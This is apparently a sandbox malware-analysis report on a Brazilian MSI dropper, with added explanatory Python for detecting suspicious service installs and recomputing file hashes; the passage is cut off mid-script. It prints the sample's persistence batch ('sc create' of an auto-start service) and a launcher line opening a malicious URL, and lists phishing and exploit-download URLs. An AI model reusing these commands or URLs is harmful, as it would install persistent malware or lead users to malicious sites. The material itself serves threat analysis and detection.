https://winrarbrasil.from-mn.com/clientes/inspecionando.php | false | - | unknown
Name | Source (process, memory dump) | Malicious | Antivirus Detection | Reputation
https://g.live.com/odclientsettings/Prod.C: | svchost.exe, 0000000E.00000003.1778037537.000001D047FAF000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://crl.ver) | svchost.exe, 0000000E.00000002.4162711913.000001D048000000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
https://g.live.com/odclientsettings/ProdV2.C: | svchost.exe, 0000000E.00000003.1778037537.000001D047F53000.00000004.00000800.00020000.00000000.sdmp; svchost.exe, 0000000E.00000003.1778037537.000001D047FB7000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe (both hits) | unknown
https://g.live.com/odclientsettings/ProdV2 | svchost.exe, 0000000E.00000003.1778037537.000001D047F72000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.audio-tool.net | windows10.exe, 00000005.00000000.1727345911.0000000000497000.00000002.00000001.01000000.00000005.sdmp | false | - | unknown
http://www.indyproject.org/ | windows10.exe, 0000001D.00000002.4303445790.0000000002A50000.00000040.00001000.00020000.00000000.sdmp; windows10.exe, 0000001D.00000003.2147178855.000000007F8AE000.00000004.00001000.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96 | svchost.exe, 0000000E.00000003.1778037537.000001D047F72000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://ip-api.com/json/ | windows10.exe, 0000001D.00000002.4303445790.0000000002A50000.00000040.00001000.00020000.00000000.sdmp; windows10.exe, 0000001D.00000003.2147178855.000000007F8AE000.00000004.00001000.00020000.00000000.sdmp | false | - | unknown
https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6 | svchost.exe, 0000000E.00000003.1778037537.000001D047F72000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
172.217.18.4 | www.google.com | United States | 15169 | GOOGLEUS | false
45.90.123.184 | winrarbrasil.from-mn.com | Germany | 35913 | DEDIPATH-LLCUS | false
216.58.206.68 | unknown | United States | 15169 | GOOGLEUS | false
239.255.255.250 | unknown | Reserved | unknown | unknown | false

Private / local IPs seen:
  - 192.168.2.7
  - 192.168.2.4
  - 192.168.2.5
  - 127.0.0.1
                      Joe Sandbox version:40.0.0 Tourmaline
                      Analysis ID:1450377
                      Start date and time:2024-06-01 19:03:44 +02:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 13m 43s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:32
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Sample name:CrzA2u67LQ.msi
                      renamed because original name is a hash value
                      Original Sample Name:a477e01f4afeaee40323a6981773ab20f7405c013f6a0398c9126e73d057616a.msi
                      Detection:MAL
                      Classification:mal40.evad.winMSI@60/37@6/8
                      EGA Information:
                      • Successful, ratio: 100%
                      HCA Information:
                      • Successful, ratio: 84%
                      • Number of executed functions: 57
                      • Number of non-executed functions: 319
                      Cookbook Comments:
                      • Found application associated with file extension: .msi
                      • Override analysis time to 240000 for current running targets taking high CPU consumption
                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                      • Excluded IPs from analysis (whitelisted): 142.250.185.163, 142.250.185.174, 64.233.166.84, 34.104.35.123, 184.28.90.27, 192.229.221.95, 217.20.57.34, 142.250.185.99, 2.19.126.137, 142.250.186.110
                      • Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, clientservices.googleapis.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, e16604.g.akamaiedge.net, update.googleapis.com, clients.l.google.com, prod.fs.microsoft.com.akadns.net
• Not all processes were analyzed, report is missing behavior information
                      • Report creation exceeded maximum time and may have missing disassembly code information.
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                      • Report size getting too big, too many NtEnumerateKey calls found.
                      • Report size getting too big, too many NtOpenFile calls found.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • Report size getting too big, too many NtReadVirtualMemory calls found.
Time | Type | Description
13:04:44 | API Interceptor | 2x Sleep call for process: svchost.exe modified
Context: IPs
Match | Associated Sample Name / URL | Detection | Threat Name
239.255.255.250 | 3qWvYGcbza.exe | malicious | Unknown
239.255.255.250 | https://raw.githubusercontent.com/ze0r/cve-2018-8453-exp/master/exp_x64_palette_length/x64/Release/exp.exe | malicious | Unknown
239.255.255.250 | https://raw.githubusercontent.com/ze0r/cve-2018-8453-exp/master/exp_x64_palette_length/x64/Release/exp.exe | malicious | Unknown
239.255.255.250 | https://raw.githubusercontent.com/ze0r/cve-2018-8453-exp/master/exp_x64_palette_length/x64/Release/exp.exe | malicious | Unknown
239.255.255.250 | 5R3DfRZ1Kb.exe | malicious | Unknown
239.255.255.250 | https://1drv.ms/o/s!Ale5u7cgFrqDgrU1Y9FuTirE1RVPjA?e=U3XZbQ | malicious | SharepointPhisher
239.255.255.250 | Quarantined Messages.zip | malicious | HTMLPhisher
239.255.255.250 | https://login.palmspringsvrbo.com | malicious | Unknown
239.255.255.250 | https://login.palmspringsvrbo.com/?26051923 | malicious | Unknown
239.255.255.250 | http://url7923.marsello.io | malicious | Unknown
                                          No context
Context: ASNs
Match | Associated Sample Name / URL | Detection | Threat Name | Context (IP)
DEDIPATH-LLCUS | UyWmCsMy4T.elf | malicious | Mirai | 45.12.141.82
DEDIPATH-LLCUS | lustsorelfar.exe | malicious | Unknown | 45.14.194.253
DEDIPATH-LLCUS | lustsorelfar.exe | malicious | Unknown | 45.14.194.253
DEDIPATH-LLCUS | SecuriteInfo.com.Trojan.InstallCore.4086.15026.2213.exe | malicious | PrivateLoader, PureLog Stealer | 185.228.19.37
DEDIPATH-LLCUS | SecuriteInfo.com.Trojan.InstallCore.4086.15026.2213.exe | malicious | PrivateLoader, PureLog Stealer | 185.228.19.54
DEDIPATH-LLCUS | EXCEL_DOCUMENT_OPEN.js | malicious | Unknown | 103.124.105.125
DEDIPATH-LLCUS | EXCEL_DOCUMENT_OPEN.js | malicious | Unknown | 103.124.105.125
DEDIPATH-LLCUS | 4_10_AC-7539.xlsx | malicious | DarkGate, MailPassView | 103.124.105.125
DEDIPATH-LLCUS | https://yesterwebring.neocities.org | malicious | Phisher | 45.89.106.174
DEDIPATH-LLCUS | statapril2024-5892.xlsx | malicious | DarkGate, MailPassView | 103.124.106.237
Context: JA3 fingerprints
Match | Associated Sample Name / URL | Detection | Threat Name | Context (IP)
28a2c9bd18a11de089ef85a160da29e4 | 3qWvYGcbza.exe | malicious | Unknown | 20.114.59.183
28a2c9bd18a11de089ef85a160da29e4 | https://raw.githubusercontent.com/ze0r/cve-2018-8453-exp/master/exp_x64_palette_length/x64/Release/exp.exe | malicious | Unknown | 20.114.59.183
28a2c9bd18a11de089ef85a160da29e4 | https://raw.githubusercontent.com/ze0r/cve-2018-8453-exp/master/exp_x64_palette_length/x64/Release/exp.exe | malicious | Unknown | 20.114.59.183
28a2c9bd18a11de089ef85a160da29e4 | 5R3DfRZ1Kb.exe | malicious | Unknown | 20.114.59.183
28a2c9bd18a11de089ef85a160da29e4 | file.exe | malicious | Clipboard Hijacker, PureLog Stealer, RisePro Stealer, zgRAT | 20.114.59.183
28a2c9bd18a11de089ef85a160da29e4 | https://1drv.ms/o/s!Ale5u7cgFrqDgrU1Y9FuTirE1RVPjA?e=U3XZbQ | malicious | SharepointPhisher | 20.114.59.183
28a2c9bd18a11de089ef85a160da29e4 | PROFORMA INV.pif.exe | malicious | FormBook, PureLog Stealer | 20.114.59.183
28a2c9bd18a11de089ef85a160da29e4 | https://login.palmspringsvrbo.com | malicious | Unknown | 20.114.59.183
28a2c9bd18a11de089ef85a160da29e4 | http://new-flirt.click/?f=qqrntu&s=687474703a2f2f646174696e6773722e636f6d2f6e65772f3f733d383426263533313839333833383938383631372664693d37672d323031382665643d64657526693d61646d696e38342c38323039372c526f6e6e792e4a61656765724064657574736368656261686e2e636f6d2c2674733d3137313730373738313726313133383530393031393535373338& | malicious | Unknown | 20.114.59.183
28a2c9bd18a11de089ef85a160da29e4 | https://lifetimeagriculturalproducer.com/watch.1366627561707?key=f02bf7f95ce614ece659fd3b99a43ebf&kw=%5B%2230-05-2024%22,%22nee%22,%22naan%22,%22kadhal%22,%22%E2%80%A2%22,%22thiraithee%22%5D&refer=https://thiraithee.net/vijay-tv-programs/nee-naan-kadhal/30-05-2024-nee-naan-kadhal/&tz=-4&dev=r&res=14.31&uuid= | malicious | Unknown | 20.114.59.183
Context: dropped files
Match | Associated Sample Name / URL | Detection | Threat Name
C:\Users\user\Pictures\fotosdaviagem\windows10.exe | z1Pedido-Faturado-NF-938731.cmd | malicious | Unknown
C:\Users\user\Pictures\fotosdaviagem\windows10.exe | arquivo.msi | malicious | Unknown
C:\Users\user\Pictures\fotosdaviagem\windows10.exe | z1Intimacao-eletronica.msi | malicious | Unknown
C:\Users\user\Pictures\fotosdaviagem\windows10.exe | Nota.msi | malicious | Unknown
C:\Windows\Installer\MSI55AB.tmp | HomeDesk.msi | malicious | Unknown
C:\Windows\Installer\MSI55AB.tmp | z1Pedido-Faturado-NF-938731.cmd | malicious | Unknown
C:\Windows\Installer\MSI55AB.tmp | arquivo.msi | malicious | Unknown
C:\Windows\Installer\MSI55AB.tmp | 25690.01808D.msi | malicious | Unknown
C:\Windows\Installer\MSI55AB.tmp | fatKCMAGKKH.msi | malicious | Unknown
C:\Windows\Installer\MSI55AB.tmp | SPMServer_2024.3.5.473.exe | malicious | Unknown
C:\Windows\Installer\MSI55AB.tmp | SPMServer_2024.2.1.7.exe | malicious | Unknown
C:\Windows\Installer\MSI55AB.tmp | SPMServer_2024.3.1.22.exe | malicious | Unknown
C:\Windows\Installer\MSI55AB.tmp | Df.mes-25664.msi | malicious | Unknown
C:\Windows\Installer\MSI55AB.tmp | FatRE012024.msi | malicious | Unknown
                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                      File Type:data
                                                                      Category:modified
                                                                      Size (bytes):9446
                                                                      Entropy (8bit):5.534642335124091
                                                                      Encrypted:false
                                                                      SSDEEP:96:4wKkAAQlZ/RdLc3Yl6MoJmlRERT4g5HN+1pd+raR9mK2TUdBFjQbLe5ubiWhNKBf:4jkfqdOCetZ2fHkEwnSzimH
                                                                      MD5:EC210E5929561F2EF410000E259CEEA4
                                                                      SHA1:2AEEED529167FAF7F8C016D1631223FB670D1578
                                                                      SHA-256:1B1267DE31A8FD25BF2D28903BD54C2C751228B425650A6BBDCE1108428AE0F3
                                                                      SHA-512:A129AE2043D06EF2E91B5EEBB359AFB21753BA02C84C7B71523E8AB47887981A7591F00EAA9240134234CF75F57BF9DA7E8388AC463A1438F00FDAE99029D012
                                                                      Malicious:false
                                                                      Preview:...@IXOS.@.....@.h.X.@.....@.....@.....@.....@.....@......&.{5DF9F6C2-148A-4336-9D2A-77B6884D39DA}..Aplicativo Windows..CrzA2u67LQ.msi.@.....@?....@.....@........&.{A964743B-CAFF-41FA-9500-18A10960F691}.....@.....@.....@.....@.......@.....@.....@.......@......Aplicativo Windows......Rollback..A.....o. .d.e. .r.e.s.t.a.u.r.a.....o.....RollbackCleanup..Removendo arquivos de backup..Arquivo: [1]....ProcessComponents%.Atualizando o registro de componentes..&.{60715A9F-4AEC-4D83-B87A-914CE6AF84AD}&.{5DF9F6C2-148A-4336-9D2A-77B6884D39DA}.@......&.{232B65CE-07F2-4C09-8446-D0B152043BFA}&.{5DF9F6C2-148A-4336-9D2A-77B6884D39DA}.@......&.{22B4B4EB-20D3-4CCD-A51F-EBD421917779}&.{5DF9F6C2-148A-4336-9D2A-77B6884D39DA}.@......&.{3A6531DD-7594-4904-AAB9-32F10FD461DF}&.{5DF9F6C2-148A-4336-9D2A-77B6884D39DA}.@......&.{4669957E-4874-4408-AF9D-19502B394F45}&.{5DF9F6C2-148A-4336-9D2A-77B6884D39DA}.@......&.{7FA89396-444D-4152-8B48-A5E58414D67B}&.{5DF9F6C2-148A-4336-9D2A-77B6884D39DA}.@......&.{1A182076-3D9
                                                                      Process:C:\Windows\System32\svchost.exe
                                                                      File Type:Extensible storage engine DataBase, version 0x620, checksum 0x6f5f707f, page size 16384, DirtyShutdown, Windows version 10.0
                                                                      Category:dropped
                                                                      Size (bytes):1310720
                                                                      Entropy (8bit):0.42210529176967665
                                                                      Encrypted:false
                                                                      SSDEEP:1536:ZSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:Zaza/vMUM2Uvz7DO
                                                                      MD5:D57C72DF476685B7732594E20FF93BD3
                                                                      SHA1:8BAF80AC3AA0C59AAB109D181D4370F011E449EA
                                                                      SHA-256:D00001848DB0ADB3F8E95585E703F9A01118C19791472DD6D1ED740377CF0991
                                                                      SHA-512:69274E82F3F2D7E789ED75BD192504ADE680E0BA1C4A7EA13557D622281CE1D701C3B7820281A4A05C4A889F8138EC9B03D67355C166E9E39BB691FFBEBF9278
                                                                      Malicious:false
                                                                      Preview:o_p.... .......A.......X\...;...{......................0.!..........{A.-....|I.h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{..................................C.].-....|#.................B.k.-....|I..........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):247128
                                                                      Entropy (8bit):3.812641351766904
                                                                      Encrypted:false
                                                                      SSDEEP:1536:fE4LHF63jJ/DoR+NlZLHv1rujed1v2bCGB1ZOavPViOl7EoSDg6CdKLjTyzvL8Dt:4YHQTZdjfnftwhhcbPSVR88JP0d
                                                                      MD5:580D93BFE1199962367F1A621F32DD18
                                                                      SHA1:0BC009975A1E706DB27C79F3C76A87519E91D6C2
                                                                      SHA-256:4EC6F197590216A5A024BFF998057CE46704BD5F9299E4D9EBCBCE0F8D13F844
                                                                      SHA-512:42754786D932A04DBF4F8728ACA4E74A952B8B03D483AC4DE795DB8231162B465B44B5CB046D77128AAC3F14C7BB49D4108FBA133B9E68C84B701159E9AA93BA
                                                                      Malicious:false
                                                                      Preview:..=.=.=. .V.e.r.b.o.s.e. .l.o.g.g.i.n.g. .s.t.a.r.t.e.d.:. .0.1./.0.6./.2.0.2.4. . .1.3.:.0.4.:.3.5. . .B.u.i.l.d. .t.y.p.e.:. .S.H.I.P. .U.N.I.C.O.D.E. .5...0.0...1.0.0.1.1...0.0. . .C.a.l.l.i.n.g. .p.r.o.c.e.s.s.:. .C.:.\.W.i.n.d.o.w.s.\.S.y.s.t.e.m.3.2.\.m.s.i.e.x.e.c...e.x.e. .=.=.=.....M.S.I. .(.c.). .(.F.C.:.0.0.). .[.1.3.:.0.4.:.3.5.:.9.6.8.].:. .F.o.n.t. .c.r.e.a.t.e.d... . .C.h.a.r.s.e.t.:. .R.e.q.=.0.,. .R.e.t.=.0.,. .F.o.n.t.:. .R.e.q.=.M.S. .S.h.e.l.l. .D.l.g.,. .R.e.t.=.M.S. .S.h.e.l.l. .D.l.g.......M.S.I. .(.c.). .(.F.C.:.0.0.). .[.1.3.:.0.4.:.3.5.:.9.6.8.].:. .F.o.n.t. .c.r.e.a.t.e.d... . .C.h.a.r.s.e.t.:. .R.e.q.=.0.,. .R.e.t.=.0.,. .F.o.n.t.:. .R.e.q.=.M.S. .S.h.e.l.l. .D.l.g.,. .R.e.t.=.M.S. .S.h.e.l.l. .D.l.g.......M.S.I. .(.c.). .(.F.C.:.3.0.). .[.1.3.:.0.4.:.3.6.:.0.4.6.].:. .R.e.s.e.t.t.i.n.g. .c.a.c.h.e.d. .p.o.l.i.c.y. .v.a.l.u.e.s.....M.S.I. .(.c.). .(.F.C.:.3.0.). .[.1.3.:.0.4.:.3.6.:.0.4.6.].:. .M.a.c.h.i.n.e. .p.o.l.i.c.y. .v.a.l.u.e. .'.D.e.b.u.g.'. .i.s. .
                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                      File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):208
                                                                      Entropy (8bit):4.9888662594672
                                                                      Encrypted:false
                                                                      SSDEEP:3:QaYJbseKDDktbrXj18BIDQK1ERNLw2ABOA53kfNINAgAEFWREX6EEDQobhL3T18l:Q7ApwFDJRku4NfIOc/Q3RVPRbj5QZ
                                                                      MD5:B3556F43ECD5512261B5A78C1C35E49A
                                                                      SHA1:6ECE39500BC03E88C10C258781EDC44A7AF97531
                                                                      SHA-256:9D410086A915681BD3FA4C5BC211C0BD7E2C9B2209CB26A125C2B9A3DDFCE15F
                                                                      SHA-512:02C4300E07EE33E74228F9CA55CBBF4BC140FA1F696C7C94B9DF522B18F2DE0992F0AAD79D4CF464FE236CB43D9292664E78C20BFDC5FC11A727475527B65214
                                                                      Malicious:false
Preview:..&cls......@echo off..REM --- Criar o servi.o ---..sc create MeuServico binPath= "%USERPROFILE%\Pictures\fotosdaviagem\windows10.exe" start= auto..REM --- Iniciar o servi.o ---..sc start MeuServico....exit
Decoded (dots in the preview are non-printable bytes; the Portuguese REM comments read "Create the service" and "Start the service"):
    &cls
    @echo off
    REM --- Criar o serviço ---
    sc create MeuServico binPath= "%USERPROFILE%\Pictures\fotosdaviagem\windows10.exe" start= auto
    REM --- Iniciar o serviço ---
    sc start MeuServico
    exit
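The batch file above is the sample's persistence step: `sc create` registers windows10.exe, sitting in the user's own Pictures folder, as an auto-start service, and because no `obj=` is given the Service Control Manager runs it as LocalSystem at every boot. On the host that call leaves a System-log Event ID 7045 ("A service was installed in the system"). What follows is an added detection example, not code from this report or from the sample: it parses constructed 7045-style records (the field names are the ones the real event message uses; the records themselves are made up for this example) and flags services whose image path lies in a user-writable location or is unquoted while containing spaces, then records auto start and LocalSystem as aggravating context. The helper names (`parse_7045`, `split_image_path`, `assess`, `scan`) and the prefix list are this example's own choices.

```python
import re
from dataclasses import dataclass, field

# Constructed sample records (not taken from the report). Each mimics the
# message body of Windows System-log Event ID 7045, which `sc create` produces.
SAMPLE_EVENTS = [
    # mirrors the dropped batch file: auto-start binary under the user's Pictures folder
    "Service Name: MeuServico\n"
    "Service File Name: C:\\Users\\user\\Pictures\\fotosdaviagem\\windows10.exe\n"
    "Service Type: user mode service\n"
    "Service Start Type: auto start\n"
    "Service Account: LocalSystem",
    # benign: Windows Update hosted in svchost under system32
    "Service Name: wuauserv\n"
    "Service File Name: C:\\Windows\\system32\\svchost.exe -k netsvcs -p\n"
    "Service Type: user mode service\n"
    "Service Start Type: demand start\n"
    "Service Account: LocalSystem",
    # unquoted image path with spaces: the classic service-path hijack condition
    "Service Name: VendorAgent\n"
    "Service File Name: C:\\Program Files\\Vendor Tools\\agent.exe -svc\n"
    "Service Type: user mode service\n"
    "Service Start Type: auto start\n"
    "Service Account: LocalSystem",
    # quoted correctly, but launched from ProgramData as a low-privilege account
    "Service Name: Updater\n"
    "Service File Name: \"C:\\ProgramData\\Updater\\upd.exe\"\n"
    "Service Type: user mode service\n"
    "Service Start Type: auto start\n"
    "Service Account: NT AUTHORITY\\LocalService",
]

# Prefixes a standard user (or an installer running in the user's context) can
# write to. A service binary has no business living under any of them.
USER_WRITABLE_PREFIXES = (
    "c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\",
    "%userprofile%", "%appdata%", "%localappdata%", "%temp%", "%tmp%",
)

FIELD_RE = re.compile(
    r"^(Service Name|Service File Name|Service Type|Service Start Type|Service Account):\s*(.*)$",
    re.M,
)


@dataclass
class ServiceInstall:
    name: str
    command: str
    start_type: str
    account: str
    image_path: str = ""
    unquoted_with_spaces: bool = False
    reasons: list = field(default_factory=list)


def parse_7045(text):
    """Pull the named fields out of one 7045 message body."""
    fields = {k: v.strip() for k, v in FIELD_RE.findall(text)}
    return ServiceInstall(
        name=fields.get("Service Name", ""),
        command=fields.get("Service File Name", ""),
        start_type=fields.get("Service Start Type", ""),
        account=fields.get("Service Account", ""),
    )


def split_image_path(command):
    """Return (image_path, unquoted_with_spaces) for a binPath / ImagePath string.

    A quoted command is unambiguous. For an unquoted one the SCM tries each
    space-delimited prefix in turn (C:\\Program.exe, C:\\Program Files\\Vendor.exe, ...),
    so the text up to the first '.exe' is taken as the intended binary and the
    ambiguity is flagged whenever that prefix contains a space.
    """
    cmd = command.strip()
    if cmd.startswith('"'):
        end = cmd.find('"', 1)
        return (cmd[1:end] if end > 0 else cmd[1:]), False
    m = re.match(r"(.+?\.exe)(?:\s|$)", cmd, re.I)
    path = m.group(1) if m else (cmd.split()[0] if cmd else "")
    return path, (" " in path)


def assess(svc):
    """Attach human-readable reasons to a parsed install; empty means not flagged."""
    svc.image_path, svc.unquoted_with_spaces = split_image_path(svc.command)
    if svc.image_path.lower().startswith(USER_WRITABLE_PREFIXES):
        svc.reasons.append("binary in user-writable location")
    if svc.unquoted_with_spaces:
        svc.reasons.append("unquoted image path containing spaces")
    if svc.reasons:  # aggravating context only matters once something is wrong
        if svc.start_type.lower().startswith("auto"):
            svc.reasons.append("auto start (survives reboot)")
        if svc.account.lower() == "localsystem":
            svc.reasons.append("runs as LocalSystem")
    return svc


def scan(events):
    """Parse every 7045 record and return only the flagged installs, in input order."""
    return [s for s in (assess(parse_7045(e)) for e in events) if s.reasons]


if __name__ == "__main__":
    for s in scan(SAMPLE_EVENTS):
        print(f"{s.name}: {s.image_path}\n  - " + "\n  - ".join(s.reasons))
```

Run as-is it reports MeuServico, VendorAgent and Updater and stays silent on wuauserv. On a live host, feed `scan` the message bodies of Event ID 7045 exported from the System log (for example via Get-WinEvent), or the ImagePath values under HKLM\SYSTEM\CurrentControlSet\Services, which follow the same quoting rules; the MeuServico rule fires on the first boot after the installer ran, which is exactly when the sandbox's second windows10.exe tree appears.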
                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):13351424
                                                                      Entropy (8bit):7.958676117497988
                                                                      Encrypted:false
                                                                      SSDEEP:393216:QT60WQMRXhaxTxgT878o1AZWgGyjO61ahtTA:0WQ+xOgTUHOWgGyjOmahp
                                                                      MD5:320D46099BCDEECF45E6A030329C1BE8
                                                                      SHA1:DB9CDA17512C03B1375CD012BE005724CCF6A774
                                                                      SHA-256:D412F849A0B31754F92F8AAA721087394B34AB55B9A26E3349970229496613E2
                                                                      SHA-512:56439CD67FC95D295BF8857B16492BBA12C61EC1EB65C6EE1EEF95C5D633D863530AE7CD989F041CB1C2543AFA0C7F04262352C8574F3946CA62CE16B51CDEB8
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                      • Antivirus: ReversingLabs, Detection: 49%
                                                                      • Antivirus: Virustotal, Detection: 34%, Browse
                                                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........PE..L....FQd..................-.........2)".......-...@...........................m......................................0l.&-..\.j.......m.......................m............................................................ ........................text.....-......................... ..`.itext........-..................... ..`.data....x....-.....................@....bss.....X...@...........................idata..`8..........................@....didata.l...........................@....edata..&-..........................@..@.rdata..E.... /.....................@..@.Hm8.....r..0/..................... ..`.?#3...............................@....F~x....p........................... ..`.rsrc.........m.....................@..@.reloc........m.....................@..B..................... 4......n3.............@..@........................................................
                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):16156854
                                                                      Entropy (8bit):7.999987454770361
                                                                      Encrypted:true
                                                                      SSDEEP:393216:b3jVMSUmx4twho2HfoWAN+d+Gstcdq5Z92/72X4o/o:LjGo4tMfFItcUn92xo/o
                                                                      MD5:697FF336A8F1278BEBD9FA3358BAE2BA
                                                                      SHA1:39514D8961C976B25E803A8EDF65AF1928D2CD2E
                                                                      SHA-256:918DE41CB24F5BE5A473B2D0881FEE5D56869640742F37466CBCAF5FD154E9CE
                                                                      SHA-512:32F943FEA634E6FB0C0B2D4E934FC671838611CEB9068840C6E7CE99036E06BE94E88B38256AC57729DF1983E0B5DC1474F7458CA32EF371B0D84077656FBDAF
                                                                      Malicious:false
                                                                      Preview:r/.fn...W.k........W.&r..r}.....B.N......N8..#.%..s..\A?.(am.|..x).....=.3}SzIU..9.R...Q.V....'.f-^..@..... .e\l7..[%.]r..N\....9.z.V...}o....I.....?B......e%.=...x.@..+U..4.U..R...j(b..9...C.o.#U.w..U!F.18......M]......D..*'Zx....n3.....Ql..U=B..,..q/..0mC...~..n....:..4. /.@.$...q|..>.fd3.u.E.X..I.........T.............s@..[/f.x:^..F*..?.).}pnx._..=...n......J..{x7...Z!F.hat....@4g.<..!=..Q9..F.E5...V~.B.1$...\.``=....;A...#.ab.3#ZA%.....S.<".@@T(@H.0.a..G`B..o..{$a1.%_......x.Q..)C....^.r..%i.,O\r..#...a.p....<...N...!6.4.r..Is.W.(..:6..........St..(..%...C..f`ZR..+.zK....."d..FwL..TR...]8.9...3.HX>;@m.v&+'.....r.)*...`n.Z...."..7;.N........wJ.*1....g..........V."....(7u.M..,o..z.R.&..w.v4.U./..V.b.\.o.z.M.i7.L.e...,U.S+.v6.P...`.w .PB.f.......j..,.:.C\...Fc..:...`:=.X......26.......G^..l.`..f.....[...x...6...v....Y.c..M.U..]k..1..).&...@...].bf.....@. .pZ.0.(.}...k...1.....:.d]L../.~.V>|qQ..t.5.>I#..>....<l...g..@]...k9kF.,!.."%h...z
                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):54
                                                                      Entropy (8bit):5.245447224305563
                                                                      Encrypted:false
                                                                      SSDEEP:3:3ugfKvpkPxBKS9Gr236TOf:+giveJr9Upg
                                                                      MD5:51C2C6285991EF6126010B102782B43D
                                                                      SHA1:9CAEC981404A3BAD4536CB42DE557EB1CFECB085
                                                                      SHA-256:3692E5F68D8F5D3A8A3782FAAC232D89C74E37ED8E9EF2853AEE0147E4D2659C
                                                                      SHA-512:9C99EE675E9D3F9320DEFF79F23B062B2E563C5E1824089DA4825F25E8F8A87E0E870758EDAA4610C78F850EA2355886CE5F30DE51C1536F8713E9045999D48E
                                                                      Malicious:false
                                                                      Preview:jn8r4IjEzoJLa1cjTx5vc2C9Sk3Ff7+76/nuToKOtShN..oKPv+W/D
                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):65
                                                                      Entropy (8bit):4.2783947909316655
                                                                      Encrypted:false
                                                                      SSDEEP:3:jhR014fMJLLE2LGK3GJMuhyVY1QVn:jH0Sf2LIK3GJM+yVY1QV
                                                                      MD5:57206556AB8C8F1DEBC669EB402C61FD
                                                                      SHA1:1F202DF2A747136DB478FF2DD01186BCEE277963
                                                                      SHA-256:EEFDBE469C26F89006BE2E921DFBC27175F531A071FF3B095DD156499BAA1882
                                                                      SHA-512:CEA554FA22FA1E9B86B77E315896A31B3B59065F41B459FE93B8B26F879970AC741C96FD17605698A0DB520AD09DB8192FE34F82D033B8E759FD6F4ED7F8E4A4
                                                                      Malicious:false
                                                                      Preview:Start https://winrarbrasil.from-mn.com/clientes/inspecionando.php
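Two of the dropped files listed above are small enough that their complete contents survive in the report's Preview fields: the 54-byte text (the ".." in its preview is the CRLF pair the file type line reports) and the 65-byte launcher line "Start https://winrarbrasil.from-mn.com/clientes/inspecionando.php". The script below is an added example, not code from the Joe Sandbox report or from the sample, that reconstructs both files as byte strings and recomputes the report's Size, Entropy (8bit) and digest fields for them. Entropy depends only on byte frequencies, so the recomputed values reproduce the listed 5.2454... and 4.2784...; the digests equal the report's MD5/SHA values only if the reconstruction is byte-exact, which the CRLF assumption makes likely but does not guarantee. The names SAMPLES, shannon_entropy_8bit, digests and describe are this example's own.

```python
import hashlib
import math
from collections import Counter

# Constructed from the report's Preview fields (sample input, not captured
# from disk). The 54-byte file is "ASCII text, with CRLF line terminators",
# so the ".." in its preview is assumed to be b"\r\n"; the 65-byte file has
# no line terminator. Both lengths equal the reported Size (bytes).
SAMPLES = {
    "text_54": b"jn8r4IjEzoJLa1cjTx5vc2C9Sk3Ff7+76/nuToKOtShN\r\noKPv+W/D",
    "launcher_65": b"Start https://winrarbrasil.from-mn.com/clientes/inspecionando.php",
}


def shannon_entropy_8bit(data: bytes) -> float:
    """Shannon entropy in bits per byte over the 256-symbol byte alphabet.

    This is the quantity the report labels 'Entropy (8bit)': 0.0 for a
    single repeated byte, 8.0 when all 256 byte values are equally frequent.
    An empty buffer is defined here as 0.0.
    """
    if not data:
        return 0.0
    n = len(data)
    counts = Counter(data)
    return -sum((c / n) * math.log2(c / n) for c in counts.values())


def digests(data: bytes) -> dict:
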